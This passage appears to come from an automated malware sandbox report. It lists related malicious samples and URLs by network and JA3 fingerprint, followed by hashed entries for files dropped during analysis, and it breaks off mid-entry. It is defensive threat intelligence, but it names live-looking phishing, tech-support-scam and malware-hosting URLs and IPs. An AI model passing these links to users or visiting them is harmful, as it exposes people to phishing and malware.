	SecuriteInfo.com.Trojan.PackedNET.2147.11643.5777.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233
	4KwjQMqbmm.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233
	dekont.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	185.196.11.12
	U8fPEL1Gwi.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	185.196.10.233
	0tGEmgFUHk.elf	Get hash	malicious	Unknown	Browse	185.196.11.64
	lhZOo8vhuI.elf	Get hash	malicious	Unknown	Browse	185.196.11.64
HP-INTERNET-ASUS	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	https://tom19-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=+1-888-289-1419	Get hash	malicious	TechSupportScam	Browse	15.204.213.5
	https://ozluc01lyejozbbzmr.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://yzkgxjyz0y4417anol.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://new1256.z1.web.core.windows.net/	Get hash	malicious	Unknown	Browse	15.204.213.5
	fP4kybhBWi.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	https://bj8lt4fm8evwyl.pages.dev/smart89/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://jainpokliultachor.pages.dev/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://pusha1qsn.z13.web.core.windows.net/	Get hash	malicious	TechSupportScam	Browse	15.204.213.5
MICROSOFT-CORP-MSN-AS-BLOCKUS	EXTERNAL Bonnie St Dryden is inviting you to collaborate on One_docx(Apr 23) DOC3848493.msg	Get hash	malicious	HTMLPhisher	Browse	40.126.32.136
	https://forms.osi.office365.us/r/sWNQn6JMmp	Get hash	malicious	Unknown	Browse	52.127.240.61
	https://lithiuimvalley.com/ssd	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.107.213.41
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DlLb9_7VBE-2BPKrWdDFE8TeQU0FNoYmRNt3BbsAfHCQfpyMVcUv91cWM1GbR6tMnpfVZqwoeCii1Z-2FHB6Wp4CGi-2FJ4Nq2flvhbRyRKwbWUqyssDslf87wBQZbBQ0EZsTXlvzjuj1ZnarL4QCJJlvUup-2FiM-2F9GPG6X3nhhKKp6sQ0v-2BBs5Jrrpzc3e5B2aUKKEJUx1Hjrx3xc16wmpK1HmM2sLiNIweMaJlJ9frDis7-2BK565mLw-3D	Get hash	malicious	HTMLPhisher	Browse	13.107.213.41
	https://www.jottacloud.com/s/359ee8b110b8ca8464998842a5d227ed979	Get hash	malicious	HTMLPhisher	Browse	20.76.133.196
	file.exe	Get hash	malicious	Amadey, PureLog Stealer, RedLine, RisePro Stealer, zgRAT	Browse	20.42.65.92
	https://assets-usa.mkt.dynamics.com/6f8aa86c-81f8-ee11-a1fa-0022482e8338/digitalassets/standaloneforms/4b367e61-8601-ef11-a1fd-0022482f3701	Get hash	malicious	HTMLPhisher	Browse	52.146.76.30
	https://sunhos-my.sharepoint.com/:b:/g/personal/mcaffrey_suncrestcare_com/EVEm8VhV9TBDp7AQUrliImYB4Kt7rXcd_m6-8qNUjxBhTA?e=P3XNTL&xsdata=MDV8MDJ8cHJpY2hhcmRzb25AY2FsdG9uLmNvbXxkM2U5ZTc1MTlkNDA0NmI2OWMzODA4ZGM2M2JhOTA4Y3w3YjU1NzU2YTg5NTg0ZWNlODFkYzVkYTZhYmRiNmE5N3wwfDB8NjM4NDk0OTAwMTUyMzMwMjUxfFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=TldIbEg2OTJiSkRUS29RRElmU3dYbTBRQUlqUTBBMXZPcGlIaTlzNnlOQT0%3d	Get hash	malicious	HTMLPhisher	Browse	20.189.173.23
	_file____C__Users_hp_Downloads_C__Users_moodyt_AppData_Local_Temp_2_RemittanceAdvice17-Apr-2024.html	Get hash	malicious	Unknown	Browse	13.107.213.51
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	52.174.3.252
CHINANET-BACKBONENo31Jin-rongStreetCN	https://acrobat.adobe.com/id/urn:aaid:sc:AP:c47bd847-0028-43f6-8564-6c8445af0ecc	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	63.140.39.93
	23xCOZerXg.exe	Get hash	malicious	PureLog Stealer, Xmrig, zgRAT	Browse	63.140.39.82
	oVOImRIAaz.elf	Get hash	malicious	Mirai	Browse	220.160.120.160
	NMdpQecbkg.elf	Get hash	malicious	Mirai	Browse	106.86.148.241
	1mHUcsxKG6.elf	Get hash	malicious	Mirai	Browse	171.113.147.175
	xzk9TKqNoI.elf	Get hash	malicious	Mirai	Browse	14.105.136.165
	sora.arm.elf	Get hash	malicious	Mirai	Browse	112.67.254.212
	sora.x86.elf	Get hash	malicious	Mirai	Browse	106.109.196.60
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	42.251.164.112
	SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exe	Get hash	malicious	PrivateLoader, PureLog Stealer	Browse	14.19.36.4

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	https://kbl8wfhm2.xn--90a1ajj.xn--p1ai/lm.php?tk=U2VjdXJpdHkJCQlzZWN1cml0eUB2ZWN0cmEuYWkJNzIxMjk1NDI1CTQ4NTE4MTgyMjA5NTU2OQlQeXRob25fTmV3CTE4OTkyODA2NDIJb3Blbglubwlubw==&url=https%3A%2F%2FS8p8QERcQ.xn--90a1ajj.xn--p1ai%2Flm%2Fpictures%2Fcti.png	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://lithiuimvalley.com/ssd	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	13.85.23.86
	https://www.canva.com/design/DAGDQX9C1RA/ikoShuUWpLZHCz9c3cYitg/view?utm_content=DAGDQX9C1RA&utm_campaign=designshare&utm_medium=link&utm_source=editor__;!!CyJlM5U!9gbXWj2ch6yN1Y5XKwfOUHQShQIbTlzYRSO4Um3mFsV2g5g0oW-nJ8MZWZtDhmirJBaPx4ZvIj53wB9NG9AkzdEZQzUOutWiQQ$	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://proofpoint.onelogin.sso-signon.com/	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DlLb9_7VBE-2BPKrWdDFE8TeQU0FNoYmRNt3BbsAfHCQfpyMVcUv91cWM1GbR6tMnpfVZqwoeCii1Z-2FHB6Wp4CGi-2FJ4Nq2flvhbRyRKwbWUqyssDslf87wBQZbBQ0EZsTXlvzjuj1ZnarL4QCJJlvUup-2FiM-2F9GPG6X3nhhKKp6sQ0v-2BBs5Jrrpzc3e5B2aUKKEJUx1Hjrx3xc16wmpK1HmM2sLiNIweMaJlJ9frDis7-2BK565mLw-3D	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86
	https://webmail.cmxserver.com/authsecure/index.php?email=kaylen@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse	13.85.23.86
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	13.85.23.86
	https://assets-usa.mkt.dynamics.com/6f8aa86c-81f8-ee11-a1fa-0022482e8338/digitalassets/standaloneforms/4b367e61-8601-ef11-a1fd-0022482f3701	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86
	https://share.hsforms.com/1PL2qy4o7QVa5ApT9dgY2igrct2w	Get hash	malicious	Unknown	Browse	13.85.23.86
	https://go.gkrtmc.com/aff_f?h=0L0Tat&aff_sub4=bustynina&aff_sub5=other&source=t0mb@s	Get hash	malicious	Unknown	Browse	13.85.23.86
3b5074b1b5d032e5620f69f9f700ff0e	https://www.linkedin.com/redir/redirect?url=https%3A%2F%2Flookerstudio%2Egoogle%2Ecom%2Fs%2FscrHqwjeA3k&urlhash=dcQj&trk=public_profile-settings_topcard-website	Get hash	malicious	Unknown	Browse	15.204.213.5
	HS202410407 Elemento de proyecto MSMU5083745.pdf.exe	Get hash	malicious	AgentTesla	Browse	15.204.213.5
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	CR-FEDEX_TN-775720741041.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	15.204.213.5
	YZPS3Bfyza.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	15.204.213.5
	QUOTATION_APRQTRA031244#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	15.204.213.5
	copy#10476235.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	15.204.213.5
	Wire Transfer Payment Receipt#2024-22-04.exe	Get hash	malicious	AgentTesla	Browse	15.204.213.5
	DHL_RF_20200712_BN_OTN 0095673441.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	15.204.213.5

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8528889281368865
Encrypted:	false
SSDEEP:	1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDuge:gJjJGtpTq2yv1AuNZRY3diu8iBVqFv
MD5:	1392D7D067419012CCE4376C9A25A4B8
SHA1:	28FF3280F1A1666CD209D6C7B90D7A49034FF41A
SHA-256:	2B2C8417E3743E611BC2408A050A59954C3F618F3DE2464A886BCC971A64EB99
SHA-512:	CAC0947614B7C21E078E0ECD9BA71566DF7504D2C9108133CBAAD1649CCFFAF8312E82F0E4F8E31D2ACA996D22AFCB14D8DDD64903DD6724BD7B14754F4B5037
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x71889f15, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6585895345849889
Encrypted:	false
SSDEEP:	1536:hSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:haza9v5hYe92UOHDnAPZ4PZf9h/9h
MD5:	61F0E55CD2FB7A9FB4EEC23CF5915B9E
SHA1:	ABC913215C8473479056A30345AEFB2BA0459045
SHA-256:	00C3AF48C5D8D2A33F32309EA164D5B4A60FE74506BCA965F69BDB375FE37514
SHA-512:	E7500A02B8EA67CCE2A612085A0C537237EB56493D33A15CAD3EB8FE1225861BA5CD4DE75F6C6949E272D4FA1BA52749400B6F6636C4A111ED1E3960CC275482
Malicious:	false
Preview:	q...... ...............X\...;...{......................0.z..........{.......\|..h.\|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...................................SS......\|.....................J.....\|...........................#......h.\|.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08075015629856075
Encrypted:	false
SSDEEP:	3:glllllKYeDBMmultGuAJkhvekl1XnyMzl//ollrekGltll/SPj:gtKzDBkltrxldnygl/AJe3l
MD5:	78CC5242965CBA4ACEC8B594939E04B9
SHA1:	19FE3B24164AF96CBECE7FABF5931D986F085063
SHA-256:	93D9E48F507A546F4AB79275797FD9E4596C7A3E30C6A0E5E3F47CE0B426C8F1
SHA-512:	6E00724D4A1BC0704290E15773C125E7FF9EE80C6218BF88150789A4C0A39E89A087B3887B271B6DDA346FDFED486956EC2B673B3790462B72C1C0084728499C
Malicious:	false
Preview:	Z.......................................;...{.......\|.......{...............{.......{...XL......{.....................J.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_10ut22kp.yp0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32wmobrq.cad.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3jqtvsky.2y0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3uafpicy.34r.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ltn4iyg.bn4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dijkljdv.qp4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gllon1lm.n0l.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouuib54l.1vv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwzbrdv4.dx3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhcyaxhi.or1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zc0e5yym.ctx.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ztcwthxn.1ca.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 20:02:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.9827391256019853
Encrypted:	false
SSDEEP:	48:8EdST+i+HqidAKZdA19ehwiZUklqehRy+3:8Jbb+y
MD5:	0369590684017940D2EFB166A8E01D72
SHA1:	6286CA3100FAB6E7B9C220CCDC95C1C2D94EB8AF
SHA-256:	14C38D430192BB3102A07ABA01BA47F62C22430D683E4DBC7EFF52CE1BC9BE20
SHA-512:	380A24EB6199E2D4D5C07C33289884870AC8B714DFDB11C9E2C162B1E299CB77834B1FFD8E12FB0B08862E3DA547AEA5BF67FA0FB95163D4C491AAEADB2F9B67
Malicious:	false
Preview:	L..................F.@.. ...$+.,....&.Q.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XH.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XH.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XH.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XH............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Apr 23 20:02:20 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9948292072362412
Encrypted:	false
SSDEEP:	48:8+dST+i+HqidAKZdA1weh/iZUkAQkqehuy+2:8Pbp9Qzy
MD5:	17488FA8447E8935655DB9C7EFB67288
SHA1:	EBF32CF097CC331ED529AA460A0A2601762B7A82
SHA-256:	614D5716B56DBB44AC5E35D5C2A183763B7F38398CD692649C20CFCB55571325
SHA-512:	679ACF03BBABF194DFD54D3271D97A73F2200D89A47A2C74D69F049CC58895BBB6EF274F367219A4F4188E2E31A5FD498D82B668E183A1DF7E76C2F3BF290C73
Malicious:	false
Preview:	L..................F.@.. ...$+.,......@.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XH.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XH.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XH.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XH............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XJ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............X.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
